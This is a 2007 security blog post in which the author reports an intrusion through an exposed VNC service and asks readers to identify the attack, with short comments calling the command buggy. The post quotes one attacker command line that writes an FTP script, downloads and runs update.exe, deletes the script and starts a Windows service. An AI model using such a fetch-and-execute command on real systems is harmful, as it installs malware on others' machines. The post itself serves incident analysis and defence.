The Lazy Genius

Security News & Brain Dumps from Xavier Ashe, a Bit9 Client Partner

  • Subscribe

  • Xavier’s tweets

    Error: Twitter did not respond. Please wait a few minutes and refresh this page.

  • Goodreads

  • Enter your email address to follow this blog and receive notifications of new posts by email.

    Join 1,186 other followers

  • Blog Stats

    • 52,779 hits

Anyone seen this?

Posted by Xavier Ashe on June 5, 2007

I've got a bastion hots that had vnc wide open.  I just got a connection.  It fired a ctrl-atl-del, opened a task manager, and ran cmd.exe.  It then executed the following command.  I was able to get a screen shot before the window disappeared, but it looked like the command was not successful.  The attackered disconnected immediately.  I have no extra users, but am downloading Helix right now to see if anything really happened.  I also have a pcap.  But does this look familiar to anyone?

cmd /c net set 21 >> ij &echo user ingenieurisiv aiisiv >> ij &echo binary >> ij &echo get update.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &update.exe &net start SharedAccess &exit

No Responses Yet to “Anyone seen this?”

  1. Anonymous said

    Are you sure the first part is correct? “net set 21 >> ij” does not make any sense, I would expect him to specify the ftp host there.


  2. Anonymous said

    Yeah… we have a screen shot of the attack. It looks like a buggy bot to me. NET SET is not a valid command on XP, and I don't think it's a valid command on any OS.


  3. Anonymous said

    Hi –
    I had something similar happen:


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: